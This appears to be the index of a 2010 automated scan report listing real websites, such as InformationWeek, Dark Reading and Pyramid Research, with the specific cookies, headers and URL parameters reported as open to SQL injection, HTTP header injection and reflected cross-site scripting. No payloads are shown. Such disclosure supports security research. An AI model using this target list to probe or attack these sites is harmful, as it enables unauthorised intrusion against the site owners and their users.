HTTP Header Injection, Cross Site Scripting, SQL Injection, 12-11-2010, Vulnerability Report, DORK, GHDB, Various Hosts

Loading

CWE-79, CWE-113, CWE-89, CAPEC-86, CAPEC-66 | Hoyt LLC Research

Report generated by XSS.CX at Sat Dec 11 20:30:53 CST 2010.


SQL Injection, XSS, HTTP Header Injection Examples

1. SQL injection

1.1. http://adserver.adtechus.com/addyn/3.0/5242.1/1183258/0/225/ADTECH [Referer HTTP header]

1.2. http://adserver.adtechus.com/addyn/3.0/5242.1/1200449/0/225/ADTECH [JEB2 cookie]

1.3. http://www.informationweek.com/ [iwkbtn_emc_101111 cookie]

1.4. http://www.informationweek.com/ [name of an arbitrarily supplied request parameter]

1.5. http://www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html [User-Agent HTTP header]

1.6. http://www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html [iwkbtn_101201 cookie]

1.7. http://www.informationweek.com/blog/main/archives/mobile/index.html [User-Agent HTTP header]

1.8. http://www.informationweek.com/blog/main/archives/mobile/index.html [s_lv_s cookie]

1.9. http://www.informationweek.com/blog/main/archives/mobile/index.html [s_sq cookie]

1.10. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [REST URL parameter 4]

1.11. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [ebNewBandWidth_.www.informationweek.com cookie]

1.12. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [s_lv_s cookie]

1.13. http://www.informationweek.com/events/ [User-Agent HTTP header]

1.14. http://www.informationweek.com/events/ [iwkbtn_101201 cookie]

1.15. http://www.informationweek.com/events/ [s_lv cookie]

1.16. http://www.informationweek.com/newsletters/DR_subscribe.jhtml [REST URL parameter 1]

1.17. http://www.informationweek.com/video/security/ [REST URL parameter 2]

1.18. http://www.informationweek.com/video/security/ [iwkbtn_101201 cookie]

1.19. http://www.informationweek.com/video/security/ [iwkbtn_emc_101111 cookie]

1.20. http://www.informationweek.com/video/security/20979809001 [REST URL parameter 2]

1.21. http://www.informationweek.com/video/security/21090964001 [User-Agent HTTP header]

1.22. http://www.informationweek.com/video/security/21090964001 [ebNewBandWidth_.www.informationweek.com cookie]

1.23. http://www.informationweek.com/video/security/21090964001 [s_lv cookie]

1.24. http://www.informationweek.com/video/security/21090964001 [s_nr cookie]

1.25. http://www.informationweek.com/video/security/21090964001 [s_sq cookie]

1.26. http://www.informationweek.com/video/security/44865844001 [iwkbtn_emc_101111 cookie]

1.27. http://www.informationweek.com/video/security/44865844001 [s_lv cookie]

1.28. http://www.informationweek.com/video/security/44865844001 [s_nr cookie]

1.29. http://www.informationweek.com/video/security/68553969001 [REST URL parameter 1]

1.30. http://www.informationweek.com/video/security/68553969001 [REST URL parameter 3]

1.31. http://www.informationweek.com/video/security/81784308001 [REST URL parameter 3]

1.32. http://www.informationweek.com/video/security/81784308001 [s_lv cookie]

1.33. http://www.informationweek.com/video/security/81784308001 [s_sq cookie]

1.34. http://www.informationweek.com/whitepaper/ [User-Agent HTTP header]

1.35. http://www.informationweek.com/whitepaper/ [s_sq cookie]

1.36. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 [Referer HTTP header]

1.37. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 [ebNewBandWidth_.www.informationweek.com cookie]

1.38. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 [iwkbtn_101201 cookie]

1.39. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 [iwkbtn_emc_101111 cookie]

1.40. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 [s_lv cookie]

1.41. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 [s_lv_s cookie]

1.42. http://www.informationweek.com/whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 [User-Agent HTTP header]

1.43. http://www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 [REST URL parameter 4]

1.44. http://www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 [Referer HTTP header]

1.45. http://www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 [User-Agent HTTP header]

1.46. http://www.pyr.com/pr_prlist/PR120910_IPTV.htm [REST URL parameter 1]

1.47. http://www.pyr.com/store/rp_Can-Vod-Save-IPTV.htm [REST URL parameter 1]

1.48. http://www.pyr.com/store/rp_Global-Mobile-Capex-Index.htm [REST URL parameter 1]

1.49. http://www.pyramidresearch.com/myaccount/register.htm [REST URL parameter 1]

1.50. http://www.pyramidresearch.com/points/item/101209.htm [REST URL parameter 1]

1.51. http://www.pyramidresearch.com/points/item/101209.htm [REST URL parameter 2]

1.52. http://www.pyramidresearch.com/points/item/111810.htm [REST URL parameter 1]

1.53. http://www.pyramidresearch.com/points/item/111810.htm [REST URL parameter 2]

1.54. http://www.pyramidresearch.com/points/item/120110.htm [REST URL parameter 1]

1.55. http://www.pyramidresearch.com/points/item/120110.htm [REST URL parameter 2]

1.56. http://www.pyramidresearch.com/store/CIRGUATEMALA.htm [REST URL parameter 1]

1.57. http://www.pyramidresearch.com/store/CIRISRAEL.htm [REST URL parameter 1]

1.58. http://www.pyramidresearch.com/store/CIRPANAMA.htm [REST URL parameter 1]

1.59. http://www.pyramidresearch.com/store/CIRSAUDIARABIA.htm [REST URL parameter 1]

1.60. http://www.pyramidresearch.com/store/CIRVIETNAM.htm [REST URL parameter 1]

1.61. http://www.pyramidresearch.com/store/PREPMNGDSERV.htm [REST URL parameter 1]

1.62. http://www.pyramidresearch.com/store/REPORT_SMARTPHONE_STRATEGIES.htm [REST URL parameter 1]

1.63. http://www.pyramidresearch.com/store/RPINTERNETTV.htm [REST URL parameter 1]

1.64. http://www.pyramidresearch.com/store/RPMBAPPSTORE.htm [REST URL parameter 1]

1.65. http://www.pyramidresearch.com/store/RPMBPAYMENT.htm [REST URL parameter 1]

1.66. http://www.pyramidresearch.com/store/RPMobileEnterpriseServices.htm [REST URL parameter 1]

1.67. http://www.pyramidresearch.com/store/RPPREPMOBSERV.htm [REST URL parameter 1]

1.68. http://www.pyramidresearch.com/store/RPWiMAXandLTE.htm [REST URL parameter 1]

1.69. http://www.pyramidresearch.com/store/ins_ame_100930.htm [REST URL parameter 1]

1.70. http://www.pyramidresearch.com/store/ins_ame_101117.htm [REST URL parameter 1]

1.71. http://www.pyramidresearch.com/store/ins_ap_101105.htm [REST URL parameter 1]

1.72. http://www.pyramidresearch.com/store/ins_eur_101025.htm [REST URL parameter 1]

1.73. http://www.pyramidresearch.com/store/ins_la_101005.htm [REST URL parameter 1]

1.74. http://www.pyramidresearch.com/store/ins_la_101109.htm [REST URL parameter 1]

1.75. http://www.pyramidresearch.com/store/ins_la_101118.htm [REST URL parameter 1]

1.76. http://www.pyramidresearch.com/store/ins_la_101124.htm [REST URL parameter 1]

1.77. http://www.pyramidresearch.com/store/shopping_cart.htm [REST URL parameter 1]

2. HTTP header injection

2.1. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

2.2. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [Pos parameter]

2.3. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

2.4. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

2.5. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]

2.6. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]

2.7. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]

2.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

3. Cross-site scripting (reflected)

3.1. http://7thspace.com/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html [REST URL parameter 3]

3.2. http://7thspace.com/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html [name of an arbitrarily supplied request parameter]

3.3. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [REST URL parameter 1]

3.4. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [REST URL parameter 2]

3.5. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [REST URL parameter 3]

3.6. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [REST URL parameter 4]

3.7. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [REST URL parameter 5]

3.8. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [name of an arbitrarily supplied request parameter]

3.9. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [REST URL parameter 1]

3.10. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [REST URL parameter 2]

3.11. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [REST URL parameter 3]

3.12. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [REST URL parameter 4]

3.13. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [REST URL parameter 5]

3.14. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [name of an arbitrarily supplied request parameter]

3.15. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [REST URL parameter 1]

3.16. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [REST URL parameter 2]

3.17. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [REST URL parameter 3]

3.18. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [REST URL parameter 4]

3.19. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [REST URL parameter 5]

3.20. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [name of an arbitrarily supplied request parameter]

3.21. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 1]

3.22. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 2]

3.23. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 3]

3.24. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 4]

3.25. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 5]

3.26. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [name of an arbitrarily supplied request parameter]

3.27. http://analytics.informationweek.com/css/prettyPhoto.css [REST URL parameter 1]

3.28. http://analytics.informationweek.com/css/prettyPhoto.css [REST URL parameter 2]

3.29. http://analytics.informationweek.com/css/style.css [REST URL parameter 1]

3.30. http://analytics.informationweek.com/css/style.css [REST URL parameter 2]

3.31. http://analytics.informationweek.com/gsearch [REST URL parameter 1]

3.32. http://analytics.informationweek.com/index/caslogin [REST URL parameter 1]

3.33. http://analytics.informationweek.com/index/caslogin [REST URL parameter 2]

3.34. http://analytics.informationweek.com/join [REST URL parameter 1]

3.35. http://analytics.informationweek.com/js/getdata.js [REST URL parameter 1]

3.36. http://analytics.informationweek.com/js/getdata.js [REST URL parameter 2]

3.37. http://analytics.informationweek.com/js/jquery-1.3.1.min.js [REST URL parameter 1]

3.38. http://analytics.informationweek.com/js/jquery-1.3.1.min.js [REST URL parameter 2]

3.39. http://analytics.informationweek.com/js/jquery.prettyPhoto.js [REST URL parameter 1]

3.40. http://analytics.informationweek.com/js/jquery.prettyPhoto.js [REST URL parameter 2]

3.41. http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html [REST URL parameter 1]

3.42. http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html [REST URL parameter 2]

3.43. http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html [REST URL parameter 3]

3.44. http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html [REST URL parameter 4]

3.45. http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html [name of an arbitrarily supplied request parameter]

3.46. http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html [REST URL parameter 1]

3.47. http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html [REST URL parameter 2]

3.48. http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html [REST URL parameter 3]

3.49. http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html [REST URL parameter 4]

3.50. http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html [name of an arbitrarily supplied request parameter]

3.51. http://analytics.informationweek.com/menu/104/Government/Government.html [REST URL parameter 1]

3.52. http://analytics.informationweek.com/menu/104/Government/Government.html [REST URL parameter 2]

3.53. http://analytics.informationweek.com/menu/104/Government/Government.html [REST URL parameter 3]

3.54. http://analytics.informationweek.com/menu/104/Government/Government.html [REST URL parameter 4]

3.55. http://analytics.informationweek.com/menu/104/Government/Government.html [name of an arbitrarily supplied request parameter]

3.56. http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html [REST URL parameter 1]

3.57. http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html [REST URL parameter 2]

3.58. http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html [REST URL parameter 3]

3.59. http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html [REST URL parameter 4]

3.60. http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html [name of an arbitrarily supplied request parameter]

3.61. http://analytics.informationweek.com/menu/106/Financial/Financial.html [REST URL parameter 1]

3.62. http://analytics.informationweek.com/menu/106/Financial/Financial.html [REST URL parameter 2]

3.63. http://analytics.informationweek.com/menu/106/Financial/Financial.html [REST URL parameter 3]

3.64. http://analytics.informationweek.com/menu/106/Financial/Financial.html [REST URL parameter 4]

3.65. http://analytics.informationweek.com/menu/106/Financial/Financial.html [name of an arbitrarily supplied request parameter]

3.66. http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html [REST URL parameter 1]

3.67. http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html [REST URL parameter 2]

3.68. http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html [REST URL parameter 3]

3.69. http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html [REST URL parameter 4]

3.70. http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html [name of an arbitrarily supplied request parameter]

3.71. http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html [REST URL parameter 1]

3.72. http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html [REST URL parameter 2]

3.73. http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html [REST URL parameter 3]

3.74. http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html [REST URL parameter 4]

3.75. http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html [name of an arbitrarily supplied request parameter]

3.76. http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html [REST URL parameter 1]

3.77. http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html [REST URL parameter 2]

3.78. http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html [REST URL parameter 3]

3.79. http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html [REST URL parameter 4]

3.80. http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html [name of an arbitrarily supplied request parameter]

3.81. http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html [REST URL parameter 1]

3.82. http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html [REST URL parameter 2]

3.83. http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html [REST URL parameter 3]

3.84. http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html [REST URL parameter 4]

3.85. http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html [name of an arbitrarily supplied request parameter]

3.86. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [REST URL parameter 1]

3.87. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [REST URL parameter 2]

3.88. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [REST URL parameter 3]

3.89. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [REST URL parameter 4]

3.90. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [name of an arbitrarily supplied request parameter]

3.91. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [REST URL parameter 1]

3.92. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [REST URL parameter 2]

3.93. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [REST URL parameter 3]

3.94. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [REST URL parameter 4]

3.95. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [name of an arbitrarily supplied request parameter]

3.96. http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.html [REST URL parameter 1]

3.97. http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.html [REST URL parameter 2]

3.98. http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.html [REST URL parameter 3]

3.99. http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.html [REST URL parameter 4]

3.100. http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.html [name of an arbitrarily supplied request parameter]

3.101. http://analytics.informationweek.com/menu/21/Security/Security.html [REST URL parameter 1]

3.102. http://analytics.informationweek.com/menu/21/Security/Security.html [REST URL parameter 2]

3.103. http://analytics.informationweek.com/menu/21/Security/Security.html [REST URL parameter 3]

3.104. http://analytics.informationweek.com/menu/21/Security/Security.html [REST URL parameter 4]

3.105. http://analytics.informationweek.com/menu/21/Security/Security.html [name of an arbitrarily supplied request parameter]

3.106. http://analytics.informationweek.com/menu/22/Soa-and-app-architecture/Soa-app-architecture.html [REST URL parameter 1]

3.107. http://analytics.informationweek.com/menu/22/Soa-and-app-architecture/Soa-app-architecture.html [REST URL parameter 2]

3.108. http://analytics.informationweek.com/menu/22/Soa-and-app-architecture/Soa-app-architecture.html [REST URL parameter 3]

3.109. http://analytics.informationweek.com/menu/22/Soa-and-app-architecture/Soa-app-architecture.html [REST URL parameter 4]

3.110. http://analytics.informationweek.com/menu/22/Soa-and-app-architecture/Soa-app-architecture.html [name of an arbitrarily supplied request parameter]

3.111. http://analytics.informationweek.com/menu/24/Storage-and-servers/Storage-server.html [REST URL parameter 1]

3.112. http://analytics.informationweek.com/menu/24/Storage-and-servers/Storage-server.html [REST URL parameter 2]

3.113. http://analytics.informationweek.com/menu/24/Storage-and-servers/Storage-server.html [REST URL parameter 3]

3.114. http://analytics.informationweek.com/menu/24/Storage-and-servers/Storage-server.html [REST URL parameter 4]

3.115. http://analytics.informationweek.com/menu/24/Storage-and-servers/Storage-server.html [name of an arbitrarily supplied request parameter]

3.116. http://analytics.informationweek.com/menu/25/Virtualization/Virtualization.html [REST URL parameter 1]

3.117. http://analytics.informationweek.com/menu/25/Virtualization/Virtualization.html [REST URL parameter 2]

3.118. http://analytics.informationweek.com/menu/25/Virtualization/Virtualization.html [REST URL parameter 3]

3.119. http://analytics.informationweek.com/menu/25/Virtualization/Virtualization.html [REST URL parameter 4]

3.120. http://analytics.informationweek.com/menu/25/Virtualization/Virtualization.html [name of an arbitrarily supplied request parameter]

3.121. http://analytics.informationweek.com/menu/5/Cloud-computing/Cloud-computing.html [REST URL parameter 1]

3.122. http://analytics.informationweek.com/menu/5/Cloud-computing/Cloud-computing.html [REST URL parameter 2]

3.123. http://analytics.informationweek.com/menu/5/Cloud-computing/Cloud-computing.html [REST URL parameter 3]

3.124. http://analytics.informationweek.com/menu/5/Cloud-computing/Cloud-computing.html [REST URL parameter 4]

3.125. http://analytics.informationweek.com/menu/5/Cloud-computing/Cloud-computing.html [name of an arbitrarily supplied request parameter]

3.126. http://analytics.informationweek.com/menu/6/Data-center/Data-center.html [REST URL parameter 1]

3.127. http://analytics.informationweek.com/menu/6/Data-center/Data-center.html [REST URL parameter 2]

3.128. http://analytics.informationweek.com/menu/6/Data-center/Data-center.html [REST URL parameter 3]

3.129. http://analytics.informationweek.com/menu/6/Data-center/Data-center.html [REST URL parameter 4]

3.130. http://analytics.informationweek.com/menu/6/Data-center/Data-center.html [name of an arbitrarily supplied request parameter]

3.131. http://analytics.informationweek.com/menu/7/Enterprise-software/Enterprise-software.html [REST URL parameter 1]

3.132. http://analytics.informationweek.com/menu/7/Enterprise-software/Enterprise-software.html [REST URL parameter 2]

3.133. http://analytics.informationweek.com/menu/7/Enterprise-software/Enterprise-software.html [REST URL parameter 3]

3.134. http://analytics.informationweek.com/menu/7/Enterprise-software/Enterprise-software.html [REST URL parameter 4]

3.135. http://analytics.informationweek.com/menu/7/Enterprise-software/Enterprise-software.html [name of an arbitrarily supplied request parameter]

3.136. http://analytics.informationweek.com/menu/8/Green-computing/Green-computing.html [REST URL parameter 1]

3.137. http://analytics.informationweek.com/menu/8/Green-computing/Green-computing.html [REST URL parameter 2]

3.138. http://analytics.informationweek.com/menu/8/Green-computing/Green-computing.html [REST URL parameter 3]

3.139. http://analytics.informationweek.com/menu/8/Green-computing/Green-computing.html [REST URL parameter 4]

3.140. http://analytics.informationweek.com/menu/8/Green-computing/Green-computing.html [name of an arbitrarily supplied request parameter]

3.141. http://analytics.informationweek.com/menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html [REST URL parameter 1]

3.142. http://analytics.informationweek.com/menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html [REST URL parameter 2]

3.143. http://analytics.informationweek.com/menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html [REST URL parameter 3]

3.144. http://analytics.informationweek.com/menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html [REST URL parameter 4]

3.145. http://analytics.informationweek.com/menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html [name of an arbitrarily supplied request parameter]

3.146. http://analytics.informationweek.com/menu/83/It-business-strategy/It-business-strategy.html [REST URL parameter 1]

3.147. http://analytics.informationweek.com/menu/83/It-business-strategy/It-business-strategy.html [REST URL parameter 2]

3.148. http://analytics.informationweek.com/menu/83/It-business-strategy/It-business-strategy.html [REST URL parameter 3]

3.149. http://analytics.informationweek.com/menu/83/It-business-strategy/It-business-strategy.html [REST URL parameter 4]

3.150. http://analytics.informationweek.com/menu/83/It-business-strategy/It-business-strategy.html [name of an arbitrarily supplied request parameter]

3.151. http://analytics.informationweek.com/menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html [REST URL parameter 1]

3.152. http://analytics.informationweek.com/menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html [REST URL parameter 2]

3.153. http://analytics.informationweek.com/menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html [REST URL parameter 3]

3.154. http://analytics.informationweek.com/menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html [REST URL parameter 4]

3.155. http://analytics.informationweek.com/menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html [name of an arbitrarily supplied request parameter]

3.156. http://analytics.informationweek.com/offer [REST URL parameter 1]

3.157. http://analytics.informationweek.com/offer [name of an arbitrarily supplied request parameter]

3.158. http://analytics.informationweek.com/profile/registration-step1.html [REST URL parameter 1]

3.159. http://analytics.informationweek.com/profile/registration-step1.html [REST URL parameter 2]

3.160. http://analytics.informationweek.com/research [REST URL parameter 1]

3.161. http://analytics.informationweek.com/research [name of an arbitrarily supplied request parameter]

3.162. http://analytics.informationweek.com/rss/index.html [REST URL parameter 1]

3.163. http://analytics.informationweek.com/rss/index.html [REST URL parameter 2]

3.164. http://analytics.informationweek.com/rss/index.html [name of an arbitrarily supplied request parameter]

3.165. http://analytics.informationweek.com/us [REST URL parameter 1]

3.166. http://analytics.informationweek.com/us [name of an arbitrarily supplied request parameter]

3.167. http://ar.voicefive.com/b/node_rcAll.pli [func parameter]

3.168. https://cloudconnectevent.reg.techweb.com/2011/Registrations/Registration [REST URL parameter 3]

3.169. http://digg.com/submit [REST URL parameter 1]

3.170. http://img.mediaplex.com/content/0/12688/116269/4274_flash_DOCSIS_02_336x280.js [mpck parameter]

3.171. http://img.mediaplex.com/content/0/12688/116269/4274_flash_DOCSIS_02_336x280.js [mpvc parameter]

3.172. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

3.173. http://www.cloudconnectevent.com/2010/exhibitor-news.php [name of an arbitrarily supplied request parameter]

3.174. http://www.cloudconnectevent.com/2010/in-the-news.php [name of an arbitrarily supplied request parameter]

3.175. http://www.cloudconnectevent.com/about/what-is-cloud-computing.php [name of an arbitrarily supplied request parameter]

3.176. http://www.cloudconnectevent.com/cloud-computing-conference/advisory-board.php [name of an arbitrarily supplied request parameter]

3.177. http://www.cloudconnectevent.com/cloud-computing-conference/cloud-economics.php [name of an arbitrarily supplied request parameter]

3.178. http://www.cloudconnectevent.com/cloud-computing-conference/cloud-industry-summit.php [name of an arbitrarily supplied request parameter]

3.179. http://www.cloudconnectevent.com/cloud-computing-conference/cloudsec.php [name of an arbitrarily supplied request parameter]

3.180. http://www.cloudconnectevent.com/cloud-computing-conference/culture-politics-and-governance.php [name of an arbitrarily supplied request parameter]

3.181. http://www.cloudconnectevent.com/cloud-computing-conference/data-and-storage.php [name of an arbitrarily supplied request parameter]

3.182. http://www.cloudconnectevent.com/cloud-computing-conference/design-patterns.php [name of an arbitrarily supplied request parameter]

3.183. http://www.cloudconnectevent.com/cloud-computing-conference/devops-and-automation.php [name of an arbitrarily supplied request parameter]

3.184. http://www.cloudconnectevent.com/cloud-computing-conference/event-schedule.php [name of an arbitrarily supplied request parameter]

3.185. http://www.cloudconnectevent.com/cloud-computing-conference/performance-and-monitoring.php [name of an arbitrarily supplied request parameter]

3.186. http://www.cloudconnectevent.com/cloud-computing-conference/private-clouds.php [name of an arbitrarily supplied request parameter]

3.187. http://www.cloudconnectevent.com/cloud-computing-conference/the-future-of-utility-computing.php [name of an arbitrarily supplied request parameter]

3.188. http://www.cloudconnectevent.com/cloud-computing-conference/track-chairs.php [name of an arbitrarily supplied request parameter]

3.189. http://www.cloudconnectevent.com/cloud-computing-conference/workshops.php [name of an arbitrarily supplied request parameter]

3.190. http://www.cloudconnectevent.com/contact-us.php [name of an arbitrarily supplied request parameter]

3.191. http://www.cloudconnectevent.com/expo/event-testimonials.php [name of an arbitrarily supplied request parameter]

3.192. http://www.cloudconnectevent.com/expo/pr-opportunities.php [name of an arbitrarily supplied request parameter]

3.193. http://www.cloudconnectevent.com/expo/request-info.php [name of an arbitrarily supplied request parameter]

3.194. http://www.cloudconnectevent.com/media-sponsors.php [name of an arbitrarily supplied request parameter]

3.195. http://www.cloudconnectevent.com/registration/faq.php [name of an arbitrarily supplied request parameter]

3.196. http://www.cloudconnectevent.com/registration/hotel-information.php [name of an arbitrarily supplied request parameter]

3.197. https://www.cmpadministration.com/ars/techweb/gettemplate.do [K parameter]

3.198. https://www.cmpadministration.com/ars/techweb/gettemplate.do [K parameter]

3.199. http://www.darkreading.com/blog/ [name of an arbitrarily supplied request parameter]

3.200. http://www.darkreading.com/blog/227700484/real-life-social-engineering.html [REST URL parameter 2]

3.201. http://www.darkreading.com/blog/227700484/real-life-social-engineering.html [REST URL parameter 3]

3.202. http://www.darkreading.com/blog/227700484/real-life-social-engineering.html [REST URL parameter 3]

3.203. http://www.darkreading.com/blog/227700484/real-life-social-engineering.html [name of an arbitrarily supplied request parameter]

3.204. http://www.darkreading.com/blog/227700498/finding-exposed-devices-on-your-network.html [REST URL parameter 2]

3.205. http://www.darkreading.com/blog/227700498/finding-exposed-devices-on-your-network.html [REST URL parameter 3]

3.206. http://www.darkreading.com/blog/227700498/finding-exposed-devices-on-your-network.html [REST URL parameter 3]

3.207. http://www.darkreading.com/blog/227700498/finding-exposed-devices-on-your-network.html [name of an arbitrarily supplied request parameter]

3.208. http://www.darkreading.com/blog/227700510/relying-on-tools-makes-you-dumber.html [REST URL parameter 2]

3.209. http://www.darkreading.com/blog/227700510/relying-on-tools-makes-you-dumber.html [REST URL parameter 3]

3.210. http://www.darkreading.com/blog/227700510/relying-on-tools-makes-you-dumber.html [REST URL parameter 3]

